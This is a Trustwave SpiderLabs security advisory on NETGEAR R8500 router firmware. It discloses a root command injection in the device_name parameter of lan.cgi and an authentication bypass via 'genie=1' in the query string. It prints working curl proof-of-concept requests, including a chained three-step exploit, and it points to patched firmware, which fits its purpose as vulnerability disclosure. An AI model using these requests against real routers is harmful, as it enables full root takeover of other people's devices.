Trustwave SpiderLabs Security Advisory TWSL2018-003: Vulnerabilities in NETGEAR R8500 router firmware Published: 02/07/2018 Version: 1.0 Vendor: NETGEAR (www.netgear.com) Product: NETGEAR R8500 router (firmware) Version affected: 1.0.2.94_1.0.79, possibly earlier versions Product description: NETGEAR R8500 router is a complex piece of hardware and software which provides functions such as remote management via web interface, USB storage support and many others. Finding 1: root level OS command execution via injection in the device_name parameter on the lan.cgi page R8500 Web management UI provides a page to manage LAN settings (lan.cgi). The page uses multiple parameters, one of them is not sanitized properly and used to build shell command which is executed as root. This makes it possible to gain complete control over the router if access to the lan.cgi is gained. Example attack: curl -d "action=Apply&device_name=A%22+%26%26+touch+%2Ftmp%2Fjimmers+%26%26+echo+%22B&sysLANIPAddr1=192&sysLANIPAddr2=168&sysLANIPAddr3=1&sysLANIPAddr4=1&sysLANSubnetMask1=255&sysLANSubnetMask2=255&sysLANSubnetMask3=255&sysLANSubnetMask4=0&rip_direction=1&sysRIPVersion=Disabled&dhcp_server=dhcp_server&sysPoolStartingAddr4=2&sysPoolFinishAddr4=254&select=-1&arp_enable=disable&ipmac_token=0&dev_name=R8500mge&lan_ipaddr=192.168.1.1&lan_netmask=255.255.255.0&rip_enable=0&rip_multicast=1" http://192.168.1.1/lan.cgi?id=988337b27ba1f3cdc280e454860f8b10d84e42da Note that after the above is executed, there is a file /tmp/jimmers owned by root. The command could fetch and execute arbitrary code from remote URL. Finding 2: Bypassing basic authentication by adding &genie=1 to the query string Logic of the parse_http_request function allows any user to bypass BASIC authentication by adding "genie" to the query string. Chained with previously reported findings (namely recovering session ID from MNU_top.htm and arbitrary code execution via the lan.cgi page) this allows arbitrary code execution on router as root user. Complete POC: 1. Get CSRF hash: curl http://192.168.1.1/MNU_top.htm | grep "id="
2. Feed the hash to the csrf program (https://github.com/SpiderLabs/advisories-poc/blob/master/TWSL2018-003/csrf.c) to recover CSRF ID and generate CSRF hash for the lan.cgi page, for example: ./csrf lang_top.cgi c98550f375a9fb3ced304692ed99329e4f7d80c8 lan.cgi page: lang_top.cgi hash: c98550f375a9fb3ced304692ed99329e4f7d80c8 Breaking CSRF starting from: 1489727736 CSRF token found: 1489727493 Hash for the new page: cbaf114c7e69e15b9c84680f6da4d6ce77b439c5 3. Launch arbirary code as root on the device via (adjust "id=" value first): curl -v -d "action=Apply&device_name=A%22+%26%26+touch+%2Ftmp%2Fjimmers+%26%26+echo+%22B&sysLANIPAddr1=192&sysLANIPAddr2=168&sysLANIPAddr3=1&sysLANIPAddr4=1&sysLANSubnetMask1=255&sysLANSubnetMask2=255&sysLANSubnetMask3=255&sysLANSubnetMask4=0&rip_direction=1&sysRIPVersion=Disabled&dhcp_server=dhcp_server&sysPoolStartingAddr4=2&sysPoolFinishAddr4=254&select=-1&arp_enable=disable&ipmac_token=0&dev_name=R8500mge&lan_ipaddr=192.168.1.1&lan_netmask=255.255.255.0&rip_enable=0&rip_multicast=1&genie=1" "http://192.168.1.1/lan.cgi?id=cbaf114c7e69e15b9c84680f6da4d6ce77b439c5&genie=1" Response containing "

Updating Settings

" comes back. Examine /tmp directory on the device. In the above snippet shell command "touch /tmp/jimmers" is executed as root. This could be adjusted to download any code from Internet via curl and launch it. Remediation Steps: Please visit the NETGEAR links in the references section to see if your model router is affected and how to download patched firmware. Revision History: 03/16/17 - Vulnerability disclosed 09/22/17 - Patch released by vendor 02/07/18 - Advisory published References 1. https://kb.netgear.com/000045850/Security-Advisory-for-Post-Authentication-Command-Injection-on-Some-Routers-and-Modem-Routers-PSV-2017-1207 2. https://kb.netgear.com/000048998/Security-Advisory-for-Authentication-Bypass-on-Some-Routers-or-Modem-Routers-PSV-2017-1208 About Trustwave: Trustwave helps businesses fight cybercrime, protect data and reduce security risk. With cloud and managed security services, integrated technologies and a team of security experts, ethical hackers and researchers, Trustwave enables businesses to transform the way they manage their information security and compliance programs. More than three million businesses are enrolled in the Trustwave TrustKeeper® cloud platform, through which Trustwave delivers automated, efficient and cost-effective threat, vulnerability and compliance management. Trustwave is headquartered in Chicago, with customers in 96 countries. For more information about Trustwave, visit https://www.trustwave.com. About Trustwave SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.